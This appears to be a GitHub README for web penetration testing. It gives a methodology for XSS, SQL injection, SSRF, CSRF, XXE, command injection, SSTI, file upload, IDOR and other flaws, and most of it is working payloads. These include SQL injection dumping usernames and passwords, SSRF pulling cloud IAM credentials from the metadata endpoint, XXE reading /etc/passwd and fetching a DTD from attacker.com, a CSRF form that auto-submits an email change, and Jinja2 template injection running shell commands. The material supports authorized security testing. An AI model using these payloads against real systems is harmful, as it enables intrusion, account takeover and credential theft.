Skip to content

Latest commit

 

History

History

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

README.md

Vulnerabilities

Comprehensive testing methodologies for common and critical web vulnerabilities.

Overview

This section covers detailed testing approaches for identifying, exploiting, and reporting security vulnerabilities in web applications.

Table of Contents


Cross-Site Scripting (XSS)

Types of XSS

  1. Reflected XSS - Payload in request, reflected in response
  2. Stored XSS - Payload stored in database, executed on retrieval
  3. DOM-based XSS - Payload executed through DOM manipulation

Testing Methodology

Basic XSS payloads

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>
<body onload=alert(1)>

Bypass techniques

<scr<script>ipt>alert(1)</script>
<ScRiPt>alert(1)</sCrIpT>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror="alert(1)">
<svg><script>alert&#40;1)</script>

Context-specific payloads

<!-- Inside HTML tag -->
"><script>alert(1)</script>

<!-- Inside attribute -->
" onmouseover="alert(1)

<!-- Inside JavaScript -->
';alert(1);//

<!-- Inside event handler -->
'-alert(1)-'

Testing checklist

  • Test all input fields (search, comments, profile fields)
  • Test URL parameters
  • Test HTTP headers (User-Agent, Referer, X-Forwarded-For)
  • Test file upload filename
  • Check for Content-Security-Policy bypasses
  • Test with different encodings (HTML, URL, Unicode)

Tools

# XSStrike
python3 xsstrike.py -u "https://target.com?param=test"

# Dalfox
dalfox url https://target.com?param=test

# Nuclei XSS templates
nuclei -u https://target.com -t nuclei-templates/vulnerabilities/xss/

SQL Injection

Detection Methods

Error-based detection

' OR '1'='1
" OR "1"="1
' OR 1=1--
admin'--
' UNION SELECT NULL--

Blind SQLi detection

' AND SLEEP(5)--
' AND BENCHMARK(5000000,MD5('A'))--
' AND IF(1=1,SLEEP(5),0)--

Exploitation Techniques

Union-based injection

' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password,NULL FROM users--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--

Boolean-based blind

' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a
' AND LENGTH(database())=5--

Time-based blind

' AND IF(1=1,SLEEP(5),0)--
' OR IF((SELECT COUNT(*) FROM users)>0,SLEEP(5),0)--

Database enumeration

-- MySQL
' UNION SELECT schema_name FROM information_schema.schemata--

-- PostgreSQL
' UNION SELECT datname FROM pg_database--

-- MSSQL
' UNION SELECT name FROM master..sysdatabases--

-- Oracle
' UNION SELECT table_name FROM all_tables--

Testing checklist

  • Test all parameters (GET, POST, headers, cookies)
  • Test with different quote types (', ", `)
  • Check error messages for database information
  • Test ORDER BY to determine column count
  • Test with SQL comments (--, #, /**/)
  • Try different database functions
  • Check for WAF and attempt bypasses

Tools

# SQLMap
sqlmap -u "https://target.com?id=1" --batch --dbs
sqlmap -u "https://target.com?id=1" -D database -T users --dump

# Manual testing with curl
curl "https://target.com?id=1' OR '1'='1"

Server-Side Request Forgery (SSRF)

Identification

Common vulnerable parameters

  • url=, uri=, path=, dest=, redirect=, image=, file=, callback=

Basic SSRF payloads

http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/
http://[::1]
http://2130706433 (decimal IP)
http://0x7f000001 (hex IP)

Exploitation Techniques

AWS metadata access

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data/

Bypass techniques

# URL encoding
http://127.0.0.1 → http://%31%32%37%2e%30%2e%30%2e%31

# Alternative IP formats
http://0.0.0.0
http://0177.0.0.1 (octal)
http://2130706433 (decimal)

# DNS rebinding
http://spoofed.burpcollaborator.net

# Open redirect bypass
http://allowed-domain.com/redirect?url=http://169.254.169.254

Testing checklist

  • Test with localhost variations
  • Test cloud metadata endpoints
  • Try internal IP ranges (10.x, 172.x, 192.168.x)
  • Test different protocols (file://, gopher://, dict://)
  • Check for URL parser inconsistencies
  • Test with Burp Collaborator
  • Attempt bypass with redirects

Tools

# SSRFmap
python3 ssrfmap.py -r request.txt -p url

# Manual testing
curl -X POST https://target.com/fetch -d "url=http://169.254.169.254/latest/meta-data/"

Cross-Site Request Forgery (CSRF)

Testing Methodology

Identification

  • Missing CSRF tokens
  • Predictable CSRF tokens
  • CSRF tokens not validated
  • Token validation only on POST

Basic CSRF PoC

<html>
  <body>
    <form action="https://target.com/change-email" method="POST">
      <input type="hidden" name="email" value="attacker@evil.com" />
      <input type="submit" value="Submit" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

CSRF with GET request

<img src="https://target.com/delete-account?confirm=yes">

CSRF with AJAX

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://target.com/api/transfer", true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.send(JSON.stringify({amount:1000, to:"attacker"}));
</script>

Testing checklist

  • Check if state-changing actions require CSRF tokens
  • Test removing CSRF token
  • Test with different user's token
  • Test with same token length but different value
  • Check if token is validated on GET requests only
  • Test with empty token value
  • Check for token leakage in referrer

Authentication Bypass

Common Bypass Techniques

SQL-based bypass

admin' OR '1'='1
admin'--
' OR 1=1--

Logic bypass

username=admin&password=anything&login=true
username=admin&bypass=true
username[]=admin&password[]=pass

OTP/2FA bypass

- Try direct access to post-auth pages
- Check if OTP validation can be skipped
- Test OTP brute-forcing (rate limit bypass)
- Test response manipulation
- Check for OTP reuse

JWT vulnerabilities

- Algorithm confusion (RS256 to HS256)
- None algorithm
- Weak signing key
- JWT secret brute-forcing
- Missing expiration validation

Password reset flaws

- Parameter pollution (email=victim&email=attacker)
- Host header injection
- Token leakage in referrer
- Predictable tokens
- Token reuse

Testing checklist

  • Test with SQLi payloads
  • Try default credentials
  • Test username enumeration
  • Check for rate limiting on login
  • Test password reset functionality
  • Check JWT implementation
  • Test OAuth flows
  • Test 2FA implementation
  • Check session management

Authorization & IDOR

IDOR (Insecure Direct Object Reference)

Common IDOR locations

/api/user/123
/profile?id=456
/document/download/789
/order/details?order_id=1001

Testing methodology

1. Create two accounts (User A and User B)
2. Perform actions as User A
3. Capture requests with object references
4. Replay requests with User B's session
5. Check if access is granted to User A's resources

Parameter manipulation

# Numeric IDs
id=123 → id=124, id=122
user_id=1000 → user_id=1, user_id=admin

# GUIDs
Try sequential or predictable patterns

# Encoded values
Decode base64/hex and modify

# Array manipulation
id=123 → id[]=123&id[]=456

Horizontal vs Vertical privilege escalation

  • Horizontal: Access other users' data at same privilege level
  • Vertical: Access higher privilege functionality

Testing checklist

  • Test all API endpoints with different user IDs
  • Try accessing admin panels with low-priv user
  • Test CRUD operations (Create, Read, Update, Delete)
  • Check for missing function-level access control
  • Test with missing, modified, or extra parameters
  • Test wildcard or * as ID value
  • Check for leaked object references in responses

File Upload Vulnerabilities

Testing Methodology

Bypass techniques

Extension bypass

file.php
file.php.jpg
file.php%00.jpg (null byte)
file.php%0a.jpg
file.php.....
file.php/
file.php.
file.pHp

Content-Type bypass

Change: Content-Type: application/x-php
To: Content-Type: image/jpeg

Magic bytes manipulation

Add GIF89a header to PHP file
Add JPEG header (FF D8 FF) to PHP file

Path traversal in upload

filename="../../../shell.php"
filename="..%2f..%2fshell.php"

Testing checklist

  • Test with executable extensions (.php, .jsp, .asp)
  • Try double extensions
  • Test with null byte injection
  • Manipulate Content-Type header
  • Add magic bytes to bypass file type checks
  • Test path traversal in filename
  • Try ZIP/archive upload with malicious files
  • Test race conditions in upload+delete
  • Check for arbitrary file overwrite

Tools

# Upload scanner
python3 upload-scanner.py -u https://target.com/upload

# Fuxploider
python3 fuxploider.py -u https://target.com/upload -t php

XXE (XML External Entity)

Basic XXE Payloads

Simple XXE

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<root>&test;</root>

XXE with parameter entity

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<root>&send;</root>

Blind XXE (out-of-band)

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
  %remote;
]>
<root></root>

XXE via SVG upload

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="500" height="500">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Testing checklist

  • Test all XML input points
  • Test with external entity references
  • Try different file paths (/etc/passwd, C:\windows\win.ini)
  • Test SSRF via XXE
  • Test with SVG file uploads
  • Check for blind XXE with out-of-band techniques
  • Test with different encodings

Remote Code Execution (RCE)

Command Injection

Basic payloads

; ls
| ls
& ls
&& ls
%0Als
`ls`
$(ls)

Bypass techniques

# Space bypass
{ls,-la}
$IFS
${IFS}
%09

# Keyword bypass
c''at /etc/passwd
c\at /etc/passwd
/???/??t /???/??ss??

Server-Side Template Injection (SSTI)

Detection

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Jinja2 (Python)

{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

Twig (PHP)

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

Testing checklist

  • Test all input fields with template syntax
  • Try command injection in system calls
  • Test deserialization vulnerabilities
  • Check for code evaluation functions
  • Test with polyglot payloads
  • Look for server logs with error messages

Business Logic Flaws

Common Scenarios

Price manipulation

amount=-100
quantity=-1
price=0

Race conditions

Send multiple requests simultaneously to:
- Redeem coupon multiple times
- Withdraw from account with insufficient funds
- Bypass rate limits

Parameter tampering

Change: role=user to role=admin
Change: isPremium=false to isPremium=true
Change: discount=10 to discount=100

Workflow bypass

Skip steps in multi-step processes
Access step 3 directly without completing steps 1 and 2

Testing checklist

  • Test negative values
  • Test very large numbers
  • Skip workflow steps
  • Replay old requests
  • Test concurrent requests
  • Manipulate prices and quantities
  • Test referral/coupon abuse
  • Check for time-based flaws

Open Redirect

Testing Methodology

Common parameters

url=, redirect=, next=, return=, dest=, continue=, redir=

Basic payloads

?redirect=https://evil.com
?redirect=//evil.com
?redirect=/\/evil.com
?redirect=https://target.com@evil.com
?redirect=https://evil.com%00.target.com

Bypass techniques

# URL encoding
https%3A%2F%2Fevil.com

# Protocol-relative
//evil.com

# Whitelist bypass
https://evil.com?target.com
https://evil.com#target.com
https://target.com.evil.com

Security Misconfiguration

Common Issues

CORS misconfiguration

Origin: https://evil.com
Check if Access-Control-Allow-Origin reflects arbitrary origins

Missing security headers

X-Frame-Options
Content-Security-Policy
Strict-Transport-Security
X-Content-Type-Options

Directory listing

/backup/
/uploads/
/.git/
/admin/

Exposed sensitive files

/.git/config
/.env
/config.php
/web.config
/phpinfo.php
/.aws/credentials

Next Steps: Check Payloads for ready-to-use exploit strings.